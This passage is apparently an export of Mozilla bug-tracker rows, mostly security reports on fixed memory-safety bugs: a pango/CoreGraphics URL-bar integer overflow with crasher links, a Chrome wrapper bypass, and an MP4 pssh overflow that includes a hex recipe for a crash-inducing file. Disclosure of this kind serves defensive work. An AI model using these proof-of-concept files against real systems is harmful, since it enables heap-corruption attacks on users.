-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fno-strict-aliasing -ffunction-sections -fdata-sections -fno-math-errno -pthread -pipe -g -Xclang -load -Xclang /builds/worker/workspace/build/src/obj-firefox/build/clang-plugin/libclang-plugin.so -Xclang -add-plugin -Xclang moz-check -O3 -fno-omit-frame-pointer -funwind-tables -Qunused-arguments -Wall -Wempty-body -Wignored-qualifiers -Wpointer-arith -Wshadow-field-in-constructor-modified -Wsign-compare -Wtype-limits -Wunreachable-code -Wunreachable-code-return -Wclass-varargs -Wfloat-overflow-conversion -Wfloat-zero-conversion -Wloop-analysis -Wstring-conversion -Wtautological-overlap-compare -Wtautological-unsigned-enum-zero-compare -Wtautological-unsigned-zero-compare -Wno-error=deprecated-declarations -Wno-error=array-bounds -Wno-error=return-std-move -Wno-error=atomic-alignment -Wformat -Wformat-security -Wno-gnu-zero-variadic-macro-arguments  -MD -MP -MF .deps/mpi.o.pp   /builds/worker/workspace/build/src/security/nss/lib/freebl/mpi/mpi.c
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/security/nss/lib/freebl/mpi/mpi.c:2125:17: warning: comparison of integers of different signs: 'int' and 'unsigned long' [-Wsign-compare]
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -          int j = MP_MIN(k, MP_DIGIT_BIT);
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -                  ^~~~~~~~~~~~~~~~~~~~~~~
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/security/nss/lib/freebl/mpi/mpi-priv.h:86:28: note: expanded from macro 'MP_MIN'
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -  #define MP_MIN(a, b) (((a) &lt; (b)) ? (a) : (b))
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -                          ~  ^  ~
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/security/nss/lib/freebl/mpi/mpi.c:2127:15: warning: comparison of integers of different signs: 'int' and 'unsigned long' [-Wsign-compare]
[task 2018-11-11T21:58:25.988Z] 21:58:25     INFO -          if (j &lt; MP_DIGIT_BIT) {
[task 2018-11-11T21:58:25.989Z] 21:58:25     INFO -              ~ ^ ~~~~~~~~~~~~
[task 2018-11-11T21:58:25.989Z] 21:58:25     INFO -  /builds/worker/workspace/build/src/security/nss/lib/freebl/mpi/mpi.c:4595:13: warning: comparison of integers of different signs: 'mp_digit' (aka 'unsigned long') and 'int' [-Wsign-compare]
[task 2018-11-11T21:58:25.989Z] 21:58:25     INFO -      if (val &gt;= r)
[task 2018-11-11T21:58:25.989Z] 21:58:25     INFO -          ~~~ ^  ~
[task 2018-11-11T21:58:25.989Z] 21:58:25     INFO -  3 warnings generated.</t>
        </is>
      </c>
      <c r="X6257" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6258">
      <c r="A6258" t="n">
        <v>480134</v>
      </c>
      <c r="B6258" t="inlineStr">
        <is>
          <t>2009-02-25 09:10:03 -0800</t>
        </is>
      </c>
      <c r="C6258" t="inlineStr">
        <is>
          <t>Heap/integer overflows during font glyph rendering reachable in FF and Camino (libpango, CoreGraphics)</t>
        </is>
      </c>
      <c r="D6258" t="inlineStr">
        <is>
          <t>2013-03-31 15:58:18 -0700</t>
        </is>
      </c>
      <c r="E6258" t="n">
        <v>1</v>
      </c>
      <c r="F6258" t="n">
        <v>1</v>
      </c>
      <c r="G6258" t="n">
        <v>3</v>
      </c>
      <c r="H6258" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6258" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6258" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6258" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L6258" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6258" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6258" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6258" t="inlineStr">
        <is>
          <t>[sg:critical?] libpango and ripc issue; multi-product issue (oCERT-2009-001)</t>
        </is>
      </c>
      <c r="Q6258" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6258" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6258" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6258" t="n">
        <v>1</v>
      </c>
      <c r="U6258" t="n">
        <v>0</v>
      </c>
      <c r="V6258" t="n">
        <v>36</v>
      </c>
      <c r="W6258" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6
Both Firefox and Camino are exposed to a font rendering integer overflow which exists independently in libpango and in Apple's CoreGraphics (ripc).
I have reported the bug upstream to Apple, but they have no timeline to fix. (Yes, this affects Safari too..)
The issue is in URL bar rendering.  If a very long document.location is set via javascript, the integer overflow is reachable.  The files at the above location show this bug for each.  
The affected code in pango is in pango_glyph_string_set_size:
An overflow check when doubling the size neglects the overflow possible on the subsequent allocation:
  string-&gt;glyphs = g_realloc (string-&gt;glyphs, string-&gt;space * sizeof (PangoGlyphInfo));
I don't have a live exploit, but this looks exploitable.  I have not yet gotten this reported upstream to libpango.  It is pending on their mailing list and I've received no response.
Because of their delay and Apple's delay, I thought it would make the most sense to put a maximum limit on the document.location.
This will be referenced with advisory oCERT-2009-001.
Reproducible: Always
Steps to Reproduce:
1. Goto a pango crasher in http://static.dataspill.org/glyph/
   E.g., http://static.dataspill.org/glyph/pango_2.html
2. Crash.
Depending on how the overflow is handled, you can get it to proceed without a crash.
(Note, I've been tinkering with the crashers so there's nothing special about the different versions, just a few tweaks.)
Actual Results:  
In camino, it is often a NULL deref.  I can get a few other random stack-addresses visible, but I haven't done a thorough analysis on the Apple libraries to know.
In ff, pango exposes the num_glyphs after a successful underallocation.  If this is used for writing to the glyph array, it will result in heap corruption.
Expected Results:  
Maximum URL length and/or integer overflow checks in libpango/ripc would stop this.
Please let me know if I can help coordinate anything.  I can be reached at my personal address: redpig@dataspill.org or at my oCERT addr: redpig@ocert.org.
I will be pursuing getting this upstream to pango, but if you have any contacts that can help, that'd be great.
In addition, if you have some idea for Camino fixes, if you plan to release the crashers, please let me know in advance.  I would like to negotiate some embargo date with Apple if possible, but who knows.</t>
        </is>
      </c>
      <c r="X6258" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6259">
      <c r="A6259" t="n">
        <v>813901</v>
      </c>
      <c r="B6259" t="inlineStr">
        <is>
          <t>2012-11-21 01:54:56 -0800</t>
        </is>
      </c>
      <c r="C6259" t="inlineStr">
        <is>
          <t>Chrome Object Wrapper can be bypassed using Object.prototype.__proto__</t>
        </is>
      </c>
      <c r="D6259" t="inlineStr">
        <is>
          <t>2024-05-30 07:52:01 -0700</t>
        </is>
      </c>
      <c r="E6259" t="n">
        <v>1</v>
      </c>
      <c r="F6259" t="n">
        <v>1</v>
      </c>
      <c r="G6259" t="n">
        <v>3</v>
      </c>
      <c r="H6259" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6259" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6259" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6259" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L6259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6259" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6259" t="inlineStr">
        <is>
          <t>[js:t][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q6259" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6259" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6259" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T6259" t="n">
        <v>1</v>
      </c>
      <c r="U6259" t="n">
        <v>0</v>
      </c>
      <c r="V6259" t="n">
        <v>29</v>
      </c>
      <c r="W6259" t="inlineStr">
        <is>
          <t>Created attachment 683930
Proof of concept
It is possible to change the prototype of an object wrapped in a cross-compartment wrapper if the setter of Object.prototype.__proto__ is called in the context of the wrapper. This can be used against chrome objects that don't explicitly define __exposedProps__ to gain access to privileged methods.
This bug appears to have been introduced in Firefox 17, the earlier versions don't have accessors on __proto__.</t>
        </is>
      </c>
      <c r="X6259" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6260">
      <c r="A6260" t="n">
        <v>467627</v>
      </c>
      <c r="B6260" t="inlineStr">
        <is>
          <t>2008-12-02 13:34:42 -0800</t>
        </is>
      </c>
      <c r="C6260" t="inlineStr">
        <is>
          <t>testopia stopped working after upgrading Bugzilla to 3.2</t>
        </is>
      </c>
      <c r="D6260" t="inlineStr">
        <is>
          <t>2008-12-29 10:17:43 -0800</t>
        </is>
      </c>
      <c r="E6260" t="n">
        <v>1</v>
      </c>
      <c r="F6260" t="n">
        <v>1</v>
      </c>
      <c r="G6260" t="n">
        <v>4</v>
      </c>
      <c r="H6260" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6260" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J6260" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6260" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6260" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6260" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6260" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6260" t="inlineStr"/>
      <c r="Q6260" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6260" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6260" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6260" t="n">
        <v>0</v>
      </c>
      <c r="U6260" t="n">
        <v>0</v>
      </c>
      <c r="V6260" t="n">
        <v>3</v>
      </c>
      <c r="W6260" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Build Identifier: Bugzilla 3.2 / Testopia 2.0
Had a working Bugzilla 3.0.5 and Testopia 2.0 system
Upgraded to Bugzilla 3.2
Reinstalled Testopia into Bugzilla 3.2 directory (just like I did with 3.0.5).
Some limited Testopia links do appear on the Web Page, but clickin on any results in the Software Error page:
Can't locate object method "bz_lock_tables" via package "Bugzilla::DB::Mysql" at Bugzilla/Testopia/Table.pm line 248.
Reproducible: Always
Steps to Reproduce:
1.Navigate to Bugzilla Home page
2.Click on 'Manage Test plans' link</t>
        </is>
      </c>
      <c r="X6260" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6261">
      <c r="A6261" t="n">
        <v>1206211</v>
      </c>
      <c r="B6261" t="inlineStr">
        <is>
          <t>2015-09-18 12:58:35 -0700</t>
        </is>
      </c>
      <c r="C6261" t="inlineStr">
        <is>
          <t>Overflow in MPEG4Extractor::readMetaData causes memory-safety bug</t>
        </is>
      </c>
      <c r="D6261" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:37 -0700</t>
        </is>
      </c>
      <c r="E6261" t="n">
        <v>1</v>
      </c>
      <c r="F6261" t="n">
        <v>1</v>
      </c>
      <c r="G6261" t="n">
        <v>3</v>
      </c>
      <c r="H6261" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6261" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6261" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K6261" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L6261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6261" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6261" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q6261" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6261" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6261" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T6261" t="n">
        <v>1</v>
      </c>
      <c r="U6261" t="n">
        <v>0</v>
      </c>
      <c r="V6261" t="n">
        <v>54</v>
      </c>
      <c r="W6261" t="inlineStr">
        <is>
          <t>MPEG4Extractor::readMetaData (media\libstagefright\frameworks\av\media\libstagefright\MPEG4Extractor.cpp) will experience an integer overflow with certain MP4 files. This causes the function to allocate a erroneously-small buffer, which it then overruns. The data causing the overrun comes directly from the MP4 file and is, thus, under an attacker's control. This bug currently is exploitable only on x64 versions of FF, but it might be possible to exploit it on x86 versions as well.
Details
-------
The bug is in lines 511-514:
511:    int psshsize = 0;
512:    for (size_t i = 0; i &lt; mPssh.size(); i++) {
513:        psshsize += 20 + mPssh[i].datalen;
514:    }
515:    if (psshsize) {
516:        char *buf = (char*)malloc(psshsize);
517:        char *ptr = buf;
518:        for (size_t i = 0; i &lt; mPssh.size(); i++) {
519:            memcpy(ptr, mPssh[i].uuid, 20); // uuid + length
520:            memcpy(ptr + 20, mPssh[i].data, mPssh[i].datalen);
521:            ptr += (20 + mPssh[i].datalen);
522:        }
523:        mFileMetaData-&gt;setData(kKeyPssh, 'pssh', buf, psshsize);
524:        free(buf);
525:    }
which don't check for overflow of |psshsize|. Thus, a file containing pssh boxes totalling &gt; 4GB cause line 513 to overflow. Line 516 then allocates an erroneously-small buffer, which lines 518-522 then overrun with data extracted directly from the MP4 file.
This bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/37c7812ce0e6/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp .
The bug is easy to invoke. Using a binary editor, create poc_header.bin with the following data:
000: 00  00  00  1c  66  74  79  70  6d  70  34  32  00  00  00  00
010: 6d  70  34  32  69  73  6f  6d  61  76  63  31  00  00  00  84
020: 66  72  65  65  00  00  00  00  00  00  00  00  00  00  00  00
030: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
040: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
050: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
060: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
070: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
080: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
090: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
Then create poc_trailer.bin with this data:
000: 00  00  0d  83  6d  6f  6f  76  00  00  00  6c  6d  76  68  64       moov   lmvhd
010: 00  00  00  00  c7  ca  ee  a7  c7  ca  ee  a8  00  01  5f  90                 _ 
020: 00  07  a5  80  00  01  00  00  01  00  00  00  00  00  00  00                   
030: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
040: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
050: 00  00  00  00  40  00  00  00  00  00  00  00  00  00  00  00       @           
060: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00                   
070: 00  00  00  03  00  00  00  18  69  6f  64  73  00  00  00  00           iods    
080: 10  80  80  80  07  00  4f  ff  ff  0f  7f  ff  00  00  06  0a         O         
090: 74  72  61  6b  00  00  00  5c  74  6b  68  64  00  00  00  01   trak   \tkhd    
0a0: c7  ca  ee  a7  c7  ca  ee  a8  00  00  00  01  00  00  00  00                   
0b0: 00  07  99  50  00  00  00  00  00  00  00  00  00  00  00  00      P            
0c0: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
0d0: 00  00  00  00  00  01  00  00  00  00  00  00  00  00  00  00                   
0e0: 00  00  00  00  40  00  00  00  02  30  00  00  01  40  00  00       @    0   @  
0f0: 00  00  05  a6  6d  64  69  61  00  00  00  20  6d  64  68  64       mdia    mdhd
100: 00  00  00  00  c7  ca  ee  a7  c7  ca  ee  a8  00  01  5f  90                 _ 
110: 00  07  99  50  55  c4  00  00  00  00  00  21  68  64  6c  72      PU      !hdlr
120: 00  00  00  00  00  00  00  00  76  69  64  65  00  00  00  00           vide    
130: 00  00  00  00  00  00  00  00  00  00  00  05  5d  6d  69  6e               ]min
140: 66  00  00  00  14  76  6d  68  64  00  00  00  01  00  00  00   f    vmhd       
150: 00  00  00  00  00  00  00  00  24  64  69  6e  66  00  00  00           $dinf   
160: 1c  64  72  65  66  00  00  00  00  00  00  00  01  00  00  00    dref           
170: 0c  75  72  6c  20  00  00  00  01  00  00  05  1d  73  74  62    url         stb
180: 6c  00  00  00  ab  73  74  73  64  00  00  00  00  00  00  00   l    stsd       
190: 01  00  00  00  9b  61  76  63  31  00  00  00  00  00  00  00        avc1       
1a0: 01  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00                   
1b0: 00  02  30  01  40  00  48  00  00  00  48  00  00  00  00  00     0 @ H   H     
1c0: 00  00  01  0e  4a  56  54  2f  41  56  43  20  43  6f  64  69       JVT/AVC Codi
1d0: 6e  67  00  00  00  00  00  00  00  00  00  00  00  00  00  00   ng              
1e0: 00  00  00  00  18  ff  ff  00  00  00  33  61  76  63  43  01             3avcC 
1f0: 42  c0  1e  ff  e1  00  1b  67  42  c0  1e  9e  21  81  18  53   B      gB   !  S
200: 4d  40  40  40  50  00  00  03  00  10  00  00  03  03  c8  f1   M@@@P           
210: 62  ee  01  00  05  68  ce  06  cb  20  00  00  00  12  63  6f   b    h        co
220: 6c  72  6e  63  6c  63  00  01  00  01  00  01  00  00  00  18   lrnclc          
230: 73  74  74  73  00  00  00  00  00  00  00  01  00  00  00  a6   stts            
240: 00  00  0b  b8  00  00  02  ac  73  74  73  7a  00  00  00  00           stsz    
250: 00  00  00  00  00  00  00  a6  00  00  56  27  00  00  0b  20             V'    
260: 00  00  05  bc  00  00  05  e2  00  00  05  c1  00  00  04  37                  7
270: 00  00  04  07  00  00  03  b6  00  00  06  45  00  00  03  73              E   s
280: 00  00  05  12  00  00  03  26  00  00  02  e9  00  00  03  7b          &amp;       {
290: 00  00  03  4a  00  00  03  6b  00  00  02  b6  00  00  03  4c      J   k       L
2a0: 00  00  02  7a  00  00  02  c7  00  00  02  2e  00  00  03  16      z       .    
2b0: 00  00  02  26  00  00  02  7f  00  00  01  ec  00  00  01  ea      &amp;            
2c0: 00  00  01  f5  00  00  01  eb  00  00  01  fa  00  00  01  e7                   
2d0: 00  00  01  fc  00  00  01  dd  00  00  01  c6  00  00  01  ae                   
2e0: 00  00  01  c8  00  00  01  b9  00  00  01  90  00  00  01  93                   
2f0: 00  00  01  8c  00  00  01  da  00  00  01  c2  00  00  05  d0                   
300: 00  00  07  b8  00  00  06  7a  00  00  09  a9  00  00  0a  2c          z       ,
310: 00  00  0a  7c  00  00  0c  b3  00  00  09  8c  00  00  09  52      |           R
320: 00  00  0c  04  00  00  0d  c1  00  00  0f  74  00  00  10  48              t   H
330: 00  00  11  06  00  00  10  61  00  00  0c  63  00  00  0c  31          a   c   1
340: 00  00  0b  42  00  00  0c  0d  00  00  0f  32  00  00  0a  7b      B       2   {
350: 00  00  0d  0f  00  00  0a  e0  00  00  0a  0e  00  00  0b  6b                  k
360: 00  00  08  74  00  00  0c  36  00  00  09  e6  00  00  06  8d      t   6        
370: 00  00  04  f8  00  00  07  8a  00  00  07  c1  00  00  09  f3                   
380: 00  00  07  c7  00  00  0a  cb  00  00  0a  d2  00  00  0b  74                  t
390: 00  00  0c  28  00  00  0a  9a  00  00  0c  60  00  00  0d  6d      (       `   m
3a0: 00  00  0c  3e  00  00  0f  fc  00  00  0e  82  00  00  0b  79      &gt;           y
3b0: 00  00  0d  e4  00  00  0d  24  00  00  0a  17  00  00  11  aa          $        
3c0: 00  00  12  65  00  00  0d  7b  00  00  12  a0  00  00  13  d8      e   {        
3d0: 00  00  11  49  00  00  0e  59  00  00  10  15  00  00  16  81      I   Y        
3e0: 00  00  09  b4  00  00  06  eb  00  00  05  ef  00  00  05  8a                   
3f0: 00  00  03  d7  00  00  04  0d  00  00  03  bb  00  00  04  6b                  k
400: 00  00  03  40  00  00  03  30  00  00  02  de  00  00  03  ae      @   0        
410: 00  00  05  cf  00  00  04  6c  00  00  05  69  00  00  05  00          l   i    
420: 00  00  06  a1  00  00  03  35  00  00  04  1a  00  00  03  fa          5        
430: 00  00  06  3d  00  00  05  d6  00  00  04  68  00  00  02  d6      =       h    
440: 00  00  04  b5  00  00  02  d9  00  00  02  7f  00  00  02  4d                  M
450: 00  00  02  7d  00  00  03  8c  00  00  02  06  00  00  02  01      }            
460: 00  00  07  7f  00  00  05  ef  00  00  05  b8  00  00  04  0a                   
470: 00  00  02  99  00  00  03  1d  00  00  07  c5  00  00  05  ac                   
480: 00  00  04  78  00  00  08  71  00  00  08  99  00  00  08  e9      x   q        
490: 00  00  08  99  00  00  05  73  00  00  07  c7  00  00  08  3d          s       =
4a0: 00  00  0b  59  00  00  0a  36  00  00  06  ba  00  00  05  f9      Y   6        
4b0: 00  00  07  2e  00  00  06  eb  00  00  04  c6  00  00  04  ba      .            
4c0: 00  00  05  66  00  00  04  31  00  00  06  8a  00  00  06  cf      f   1        
4d0: 00  00  06  fe  00  00  04  97  00  00  02  43  00  00  03  e2              C    
4e0: 00  00  04  06  00  00  02  e6  00  00  02  6b  00  00  02  75              k   u
4f0: 00  00  00  28  73  74  73  63  00  00  00  00  00  00  00  02      (stsc        
500: 00  00  00  01  00  00  00  04  00  00  00  01  00  00  00  2a                  *
510: 00  00  00  02  00  00  00  01  00  00  00  b8  73  74  63  6f               stco
520: 00  00  00  00  00  00  00  2a  00  00  00  a8  00  00  73  e6          *      s 
530: 00  00  8b  f4  00  00  a4  08  00  00  b7  64  00  00  c8  a5              d    
540: 00  00  d7  d8  00  00  e4  a5  00  00  ec  5f  00  00  f8  5f              _   _
550: 00  01  04  41  00  01  1f  c3  00  01  51  85  00  01  84  7e      A      Q    ~
560: 00  01  cc  a6  00  02  03  c0  00  02  3c  52  00  02  66  75             &lt;R  fu
570: 00  02  8a  1c  00  02  b4  a6  00  02  e7  66  00  03  23  01              f  # 
580: 00  03  5d  ac  00  03  9e  97  00  03  ea  64  00  04  26  0a     ]        d  &amp; 
590: 00  04  3e  69  00  04  4c  ff  00  04  63  d9  00  04  7e  43     &gt;i  L   c   ~C
5a0: 00  04  98  9b  00  04  ad  a9  00  04  be  f7  00  04  d7  94                   
5b0: 00  04  ed  6c  00  05  0e  3b  00  05  2d  c9  00  05  59  f0      l   ;  -   Y 
5c0: 00  05  7b  82  00  05  95  2b  00  05  b3  da  00  05  c6  67     {    +       g
5d0: 00  00  00  14  73  74  73  73  00  00  00  00  00  00  00  01       stss        
5e0: 00  00  00  01  00  00  00  b2  73  64  74  70  00  00  00  00           sdtp    
5f0: 04  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44    DDDDDDDDDDDDDDD
600: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
610: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
620: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
630: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
640: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
650: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
660: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
670: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
680: 44  44  44  44  44  44  44  44  44  44  44  44  44  44  44  44   DDDDDDDDDDDDDDDD
690: 44  44  44  44  44  44  00  00  06  7e  74  72  61  6b  00  00   DDDDDD   ~trak  
6a0: 00  5c  74  6b  68  64  00  00  00  03  c7  ca  ee  a7  c7  ca    \tkhd          
6b0: ee  a8  00  00  00  02  00  00  00  00  00  07  a5  80  00  00                   
6c0: 00  00  00  00  00  00  00  00  00  00  01  00  00  00  00  01                   
6d0: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  01                   
6e0: 00  00  00  00  00  00  00  00  00  00  00  00  00  00  40  00                 @ 
6f0: 00  00  00  00  00  00  00  00  00  00  00  00  06  04  6d  64                 md
700: 69  61  00  00  00  20  6d  64  68  64  00  00  00  00  c7  ca   ia    mdhd      
710: ee  a7  c7  ca  ee  a8  00  00  bb  80  00  04  14  00  15  c7                   
720: 00  00  00  00  00  21  68  64  6c  72  00  00  00  00  00  00        !hdlr      
730: 00  00  73  6f  75  6e  00  00  00  00  00  00  00  00  00  00     soun          
740: 00  00  00  00  00  05  bb  6d  69  6e  66  00  00  00  10  73          minf    s
750: 6d  68  64  00  00  00  00  00  00  00  00  00  00  00  24  64   mhd           $d
760: 69  6e  66  00  00  00  1c  64  72  65  66  00  00  00  00  00   inf    dref     
770: 00  00  01  00  00  00  0c  75  72  6c  20  00  00  00  01  00          url      
780: 00  05  7f  73  74  62  6c  00  00  00  67  73  74  73  64  00      stbl   gstsd 
790: 00  00  00  00  00  00  01  00  00  00  57  6d  70  34  61  00             Wmp4a 
7a0: 00  00  00  00  00  00  01  00  00  00  00  00  00  00  00  00                   
7b0: 01  00  10  00  00  00  00  bb  80  00  00  00  00  00  33  65                 3e
7c0: 73  64  73  00  00  00  00  03  80  80  80  22  00  00  00  04   sds        "    
7d0: 80  80  80  14  40  15  00  01  18  00  01  65  f0  00  01  44       @      e   D
7e0: 6b  05  80  80  80  02  11  88  06  80  80  80  01  02  00  00   k               
7f0: 00  18  73  74  74  73  00  00  00  00  00  00  00  01  00  00     stts          
800: 01  05  00  00  04  00  00  00  04  28  73  74  73  7a  00  00            (stsz  
810: 00  00  00  00  00  00  00  00  01  05  00  00  00  f7  00  00                   
820: 00  db  00  00  00  e1  00  00  00  e5  00  00  00  e9  00  00                   
830: 00  e8  00  00  00  f0  00  00  00  f1  00  00  00  ef  00  00                   
840: 00  d8  00  00  00  e6  00  00  00  e7  00  00  00  e9  00  00                   
850: 00  eb  00  00  00  ea  00  00  00  e8  00  00  00  e1  00  00                   
860: 00  e7  00  00  00  d7  00  00  00  da  00  00  00  d9  00  00                   
870: 00  db  00  00  00  e9  00  00  00  ee  00  00  00  e5  00  00                   
880: 00  e1  00  00  00  e6  00  00  00  e5  00  00  00  d8  00  00                   
890: 00  dd  00  00  00  dd  00  00  00  d5  00  00  00  ea  00  00                   
8a0: 00  dd  00  00  00  d0  00  00  00  d6  00  00  00  e9  00  00                   
8b0: 00  bc  00  00  00  ab  00  00  00  b3  00  00  00  b5  00  00                   
8c0: 00  bc  00  00  00  ce  00  00  00  b4  00  00  00  b6  00  00                   
8d0: 00  b3  00  00  00  b6  00  00  00  b7  00  00  00  bf  00  00                   
8e0: 00  b7  00  00  00  cd  00  00  00  c1  00  00  00  ba  00  00                   
8f0: 00  a7  00  00  00  b4  00  00  00  b1  00  00  00  be  00  00                   
900: 00  d0  00  00  00  ba  00  00  00  bc  00  00  00  c4  00  00                   
910: 00  c6  00  00  00  cb  00  00  00  c4  00  00  00  c3  00  00                   
920: 00  c8  00  00  00  d2  00  00  00  d2  00  00  00  d6  00  00                   
930: 00  f5  00  00  00  fa  00  00  00  f6  00  00  01  02  00  00                   
940: 00  fc  00  00  00  fc  00  00  00  ee  00  00  00  e6  00  00                   
950: 00  ea  00  00  00  ea  00  00  00  e8  00  00  00  de  00  00                   
960: 00  df  00  00  00  e7  00  00  00  f6  00  00  00  ff  00  00                   
970: 01  03  00  00  00  f6  00  00  01  08  00  00  01  03  00  00                   
980: 00  fd  00  00  01  05  00  00  01  02  00  00  01  00  00  00                   
990: 01  14  00  00  01  18  00  00  00  fd  00  00  00  fb  00  00                   
9a0: 01  11  00  00  01  05  00  00  01  05  00  00  01  0a  00  00                   
9b0: 01  01  00  00  00  f3  00  00  00  f7  00  00  00  f7  00  00                   
9c0: 01  01  00  00  01  02  00  00  00  f8  00  00  00  f8  00  00                   
9d0: 00  ef  00  00  00  ed  00  00  00  e3  00  00  00  ec  00  00                   
9e0: 00  e2  00  00  00  e8  00  00  00  dc  00  00  00  e0  00  00                   
